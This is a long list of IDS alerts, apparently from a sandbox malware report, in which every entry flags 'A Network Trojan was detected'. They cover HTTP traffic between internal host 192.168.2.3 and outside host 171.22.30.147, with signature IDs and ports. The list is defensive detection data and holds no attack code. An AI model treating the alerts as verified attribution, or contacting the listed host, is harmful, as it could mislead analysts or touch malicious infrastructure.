            Timestamp:192.168.2.3171.22.30.14749799802024318 01/05/23-08:52:40.836883
            SID:2024318
            Source Port:49799
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498582025483 01/05/23-08:52:58.421210
            SID:2025483
            Source Port:80
            Destination Port:49858
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749984802825766 01/05/23-08:53:35.743967
            SID:2825766
            Source Port:49984
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749933802025381 01/05/23-08:53:20.043516
            SID:2025381
            Source Port:49933
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749770802024318 01/05/23-08:52:31.112136
            SID:2024318
            Source Port:49770
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749882802021641 01/05/23-08:53:04.789158
            SID:2021641
            Source Port:49882
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749855802025381 01/05/23-08:52:57.514506
            SID:2025381
            Source Port:49855
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749942802024318 01/05/23-08:53:22.441601
            SID:2024318
            Source Port:49942
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749942802024313 01/05/23-08:53:22.441601
            SID:2024313
            Source Port:49942
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749770802024313 01/05/23-08:52:31.112136
            SID:2024313
            Source Port:49770
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498362025483 01/05/23-08:52:51.771164
            SID:2025483
            Source Port:80
            Destination Port:49836
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749979802025381 01/05/23-08:53:34.430839
            SID:2025381
            Source Port:49979
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749752802025381 01/05/23-08:52:26.039085
            SID:2025381
            Source Port:49752
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749795802825766 01/05/23-08:52:39.717554
            SID:2825766
            Source Port:49795
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749749802025381 01/05/23-08:52:25.162571
            SID:2025381
            Source Port:49749
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749989802021641 01/05/23-08:53:37.099082
            SID:2021641
            Source Port:49989
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749836802024313 01/05/23-08:52:51.681664
            SID:2024313
            Source Port:49836
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750071802825766 01/05/23-08:54:00.426977
            SID:2825766
            Source Port:50071
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749838802825766 01/05/23-08:52:52.824149
            SID:2825766
            Source Port:49838
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497782025483 01/05/23-08:52:35.041705
            SID:2025483
            Source Port:80
            Destination Port:49778
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749747802024313 01/05/23-08:52:24.577114
            SID:2024313
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749829802825766 01/05/23-08:52:49.001962
            SID:2825766
            Source Port:49829
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749927802825766 01/05/23-08:53:18.426652
            SID:2825766
            Source Port:49927
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497402025483 01/05/23-08:52:22.715646
            SID:2025483
            Source Port:80
            Destination Port:49740
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749990802025381 01/05/23-08:53:37.383838
            SID:2025381
            Source Port:49990
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750058802024318 01/05/23-08:53:57.002594
            SID:2024318
            Source Port:50058
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749750802024318 01/05/23-08:52:25.450968
            SID:2024318
            Source Port:49750
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750002802825766 01/05/23-08:53:40.505314
            SID:2825766
            Source Port:50002
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749825802021641 01/05/23-08:52:47.903129
            SID:2021641
            Source Port:49825
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750061802024313 01/05/23-08:53:57.824423
            SID:2024313
            Source Port:50061
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750058802024313 01/05/23-08:53:57.002594
            SID:2024313
            Source Port:50058
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749736802021641 01/05/23-08:52:21.543284
            SID:2021641
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497372025483 01/05/23-08:52:21.896475
            SID:2025483
            Source Port:80
            Destination Port:49737
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750061802024318 01/05/23-08:53:57.824423
            SID:2024318
            Source Port:50061
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498772025483 01/05/23-08:53:03.510914
            SID:2025483
            Source Port:80
            Destination Port:49877
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749726802825766 01/05/23-08:52:18.702884
            SID:2825766
            Source Port:49726
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749750802024313 01/05/23-08:52:25.450968
            SID:2024313
            Source Port:49750
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749707802021641 01/05/23-08:52:10.342729
            SID:2021641
            Source Port:49707
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749796802021641 01/05/23-08:52:39.986568
            SID:2021641
            Source Port:49796
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749864802025381 01/05/23-08:52:59.960618
            SID:2025381
            Source Port:49864
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749767802024313 01/05/23-08:52:30.299348
            SID:2024313
            Source Port:49767
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749856802024318 01/05/23-08:52:57.793570
            SID:2024318
            Source Port:49856
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749951802021641 01/05/23-08:53:24.927407
            SID:2021641
            Source Port:49951
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749959802025381 01/05/23-08:53:28.075379
            SID:2025381
            Source Port:49959
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749862802021641 01/05/23-08:52:59.436708
            SID:2021641
            Source Port:49862
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500372025483 01/05/23-08:53:51.398803
            SID:2025483
            Source Port:80
            Destination Port:50037
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749767802024318 01/05/23-08:52:30.299348
            SID:2024318
            Source Port:49767
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749898802825766 01/05/23-08:53:09.845609
            SID:2825766
            Source Port:49898
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749964802825766 01/05/23-08:53:30.400374
            SID:2825766
            Source Port:49964
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749953802025381 01/05/23-08:53:25.469204
            SID:2025381
            Source Port:49953
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500152025483 01/05/23-08:53:44.078205
            SID:2025483
            Source Port:80
            Destination Port:50015
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499912025483 01/05/23-08:53:37.704453
            SID:2025483
            Source Port:80
            Destination Port:49991
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499942025483 01/05/23-08:53:38.493200
            SID:2025483
            Source Port:80
            Destination Port:49994
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750057802025381 01/05/23-08:53:56.743180
            SID:2025381
            Source Port:50057
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498052025483 01/05/23-08:52:42.560455
            SID:2025483
            Source Port:80
            Destination Port:49805
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750060802025381 01/05/23-08:53:57.543966
            SID:2025381
            Source Port:50060
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749948802024313 01/05/23-08:53:24.079081
            SID:2024313
            Source Port:49948
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749714802825766 01/05/23-08:52:13.349412
            SID:2825766
            Source Port:49714
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749710802021641 01/05/23-08:52:11.662757
            SID:2021641
            Source Port:49710
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749779802024313 01/05/23-08:52:35.235559
            SID:2024313
            Source Port:49779
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749723802825766 01/05/23-08:52:17.811814
            SID:2825766
            Source Port:49723
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749908802021641 01/05/23-08:53:13.214132
            SID:2021641
            Source Port:49908
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749812802825766 01/05/23-08:52:44.412618
            SID:2825766
            Source Port:49812
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750055802024313 01/05/23-08:53:56.183544
            SID:2024313
            Source Port:50055
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750034802825766 01/05/23-08:53:50.478539
            SID:2825766
            Source Port:50034
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497622025483 01/05/23-08:52:28.957388
            SID:2025483
            Source Port:80
            Destination Port:49762
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497432025483 01/05/23-08:52:23.546435
            SID:2025483
            Source Port:80
            Destination Port:49743
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749917802021641 01/05/23-08:53:15.635846
            SID:2021641
            Source Port:49917
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497842025483 01/05/23-08:52:36.757244
            SID:2025483
            Source Port:80
            Destination Port:49784
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499502025483 01/05/23-08:53:24.713779
            SID:2025483
            Source Port:80
            Destination Port:49950
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497212025483 01/05/23-08:52:17.311222
            SID:2025483
            Source Port:80
            Destination Port:49721
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749865802024313 01/05/23-08:53:00.234414
            SID:2024313
            Source Port:49865
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749867802025381 01/05/23-08:53:00.773467
            SID:2025381
            Source Port:49867
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749954802024318 01/05/23-08:53:25.726692
            SID:2024318
            Source Port:49954
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749894802021641 01/05/23-08:53:08.006895
            SID:2021641
            Source Port:49894
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749741802024313 01/05/23-08:52:22.916909
            SID:2024313
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749954802024313 01/05/23-08:53:25.726692
            SID:2024313
            Source Port:49954
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749948802024318 01/05/23-08:53:24.079081
            SID:2024318
            Source Port:49948
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750015802021641 01/05/23-08:53:43.993137
            SID:2021641
            Source Port:50015
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749778802025381 01/05/23-08:52:34.958959
            SID:2025381
            Source Port:49778
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749865802024318 01/05/23-08:53:00.234414
            SID:2024318
            Source Port:49865
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749741802024318 01/05/23-08:52:22.916909
            SID:2024318
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749977802021641 01/05/23-08:53:33.899852
            SID:2021641
            Source Port:49977
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749996802825766 01/05/23-08:53:38.933239
            SID:2825766
            Source Port:49996
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499722025483 01/05/23-08:53:32.654908
            SID:2025483
            Source Port:80
            Destination Port:49972
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749921802025381 01/05/23-08:53:16.794242
            SID:2025381
            Source Port:49921
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498142025483 01/05/23-08:52:45.034058
            SID:2025483
            Source Port:80
            Destination Port:49814
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749703802025381 01/05/23-08:52:08.565296
            SID:2025381
            Source Port:49703
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750031802025381 01/05/23-08:53:49.661487
            SID:2025381
            Source Port:50031
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749967802825766 01/05/23-08:53:31.230819
            SID:2825766
            Source Port:49967
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749789802825766 01/05/23-08:52:38.076275
            SID:2825766
            Source Port:49789
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750012802024318 01/05/23-08:53:43.190304
            SID:2024318
            Source Port:50012
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749928802024318 01/05/23-08:53:18.678448
            SID:2024318
            Source Port:49928
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499412025483 01/05/23-08:53:22.247388
            SID:2025483
            Source Port:80
            Destination Port:49941
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750074802825766 01/05/23-08:54:01.233569
            SID:2825766
            Source Port:50074
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749928802024313 01/05/23-08:53:18.678448
            SID:2024313
            Source Port:49928
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749924802825766 01/05/23-08:53:17.587003
            SID:2825766
            Source Port:49924
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749727802024318 01/05/23-08:52:18.985108
            SID:2024318
            Source Port:49727
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497562025483 01/05/23-08:52:27.312696
            SID:2025483
            Source Port:80
            Destination Port:49756
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498922025483 01/05/23-08:53:07.550899
            SID:2025483
            Source Port:80
            Destination Port:49892
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749746802825766 01/05/23-08:52:24.299560
            SID:2825766
            Source Port:49746
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497282025483 01/05/23-08:52:19.353553
            SID:2025483
            Source Port:80
            Destination Port:49728
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749822802021641 01/05/23-08:52:47.112264
            SID:2021641
            Source Port:49822
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750055802024318 01/05/23-08:53:56.183544
            SID:2024318
            Source Port:50055
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750031802825766 01/05/23-08:53:49.661487
            SID:2825766
            Source Port:50031
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749970802025381 01/05/23-08:53:32.043326
            SID:2025381
            Source Port:49970
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750035802024313 01/05/23-08:53:50.741604
            SID:2024313
            Source Port:50035
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749993802025381 01/05/23-08:53:38.145026
            SID:2025381
            Source Port:49993
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749845802021641 01/05/23-08:52:54.838950
            SID:2021641
            Source Port:49845
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749707802024318 01/05/23-08:52:10.342729
            SID:2024318
            Source Port:49707
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749810802024313 01/05/23-08:52:43.863274
            SID:2024313
            Source Port:49810
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749707802024313 01/05/23-08:52:10.342729
            SID:2024313
            Source Port:49707
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749810802024318 01/05/23-08:52:43.863274
            SID:2024318
            Source Port:49810
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749750802021641 01/05/23-08:52:25.450968
            SID:2021641
            Source Port:49750
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749792802025381 01/05/23-08:52:38.887901
            SID:2025381
            Source Port:49792
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750012802024313 01/05/23-08:53:43.190304
            SID:2024313
            Source Port:50012
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749833802024313 01/05/23-08:52:50.090304
            SID:2024313
            Source Port:49833
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749951802024318 01/05/23-08:53:24.927407
            SID:2024318
            Source Port:49951
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749891802021641 01/05/23-08:53:07.205477
            SID:2021641
            Source Port:49891
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750047802021641 01/05/23-08:53:54.007519
            SID:2021641
            Source Port:50047
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749796802024313 01/05/23-08:52:39.986568
            SID:2024313
            Source Port:49796
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749773802024313 01/05/23-08:52:31.909319
            SID:2024313
            Source Port:49773
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749924802025381 01/05/23-08:53:17.587003
            SID:2025381
            Source Port:49924
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749746802025381 01/05/23-08:52:24.299560
            SID:2025381
            Source Port:49746
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749833802024318 01/05/23-08:52:50.090304
            SID:2024318
            Source Port:49833
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500682025483 01/05/23-08:53:59.729426
            SID:2025483
            Source Port:80
            Destination Port:50068
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749887802025381 01/05/23-08:53:06.117016
            SID:2025381
            Source Port:49887
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749974802024318 01/05/23-08:53:33.106432
            SID:2024318
            Source Port:49974
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499792025483 01/05/23-08:53:34.509731
            SID:2025483
            Source Port:80
            Destination Port:49979
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749773802024318 01/05/23-08:52:31.909319
            SID:2024318
            Source Port:49773
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498422025483 01/05/23-08:52:54.095459
            SID:2025483
            Source Port:80
            Destination Port:49842
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749951802024313 01/05/23-08:53:24.927407
            SID:2024313
            Source Port:49951
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749993802825766 01/05/23-08:53:38.145026
            SID:2825766
            Source Port:49993
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749974802024313 01/05/23-08:53:33.106432
            SID:2024313
            Source Port:49974
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749796802024318 01/05/23-08:52:39.986568
            SID:2024318
            Source Port:49796
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749994802024313 01/05/23-08:53:38.408241
            SID:2024313
            Source Port:49994
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749990802825766 01/05/23-08:53:37.383838
            SID:2825766
            Source Port:49990
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749852802825766 01/05/23-08:52:56.705137
            SID:2825766
            Source Port:49852
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749723802025381 01/05/23-08:52:17.811814
            SID:2025381
            Source Port:49723
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500182025483 01/05/23-08:53:45.088343
            SID:2025483
            Source Port:80
            Destination Port:50018
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749994802024318 01/05/23-08:53:38.408241
            SID:2024318
            Source Port:49994
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749868802021641 01/05/23-08:53:01.029018
            SID:2021641
            Source Port:49868
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749908802024313 01/05/23-08:53:13.214132
            SID:2024313
            Source Port:49908
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749704802024318 01/05/23-08:52:08.934535
            SID:2024318
            Source Port:49704
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750032802024318 01/05/23-08:53:49.938594
            SID:2024318
            Source Port:50032
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749908802024318 01/05/23-08:53:13.214132
            SID:2024318
            Source Port:49908
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750081802024318 01/05/23-08:54:03.233046
            SID:2024318
            Source Port:50081
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750005802825766 01/05/23-08:53:41.297546
            SID:2825766
            Source Port:50005
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750032802024313 01/05/23-08:53:49.938594
            SID:2024313
            Source Port:50032
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749730802021641 01/05/23-08:52:19.853027
            SID:2021641
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749704802024313 01/05/23-08:52:08.934535
            SID:2024313
            Source Port:49704
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749747802024318 01/05/23-08:52:24.577114
            SID:2024318
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750044802021641 01/05/23-08:53:53.227481
            SID:2021641
            Source Port:50044
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750081802024313 01/05/23-08:54:03.233046
            SID:2024313
            Source Port:50081
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750015802024318 01/05/23-08:53:43.993137
            SID:2024318
            Source Port:50015
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749925802024318 01/05/23-08:53:17.874226
            SID:2024318
            Source Port:49925
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749865802021641 01/05/23-08:53:00.234414
            SID:2021641
            Source Port:49865
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749888802024318 01/05/23-08:53:06.392338
            SID:2024318
            Source Port:49888
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
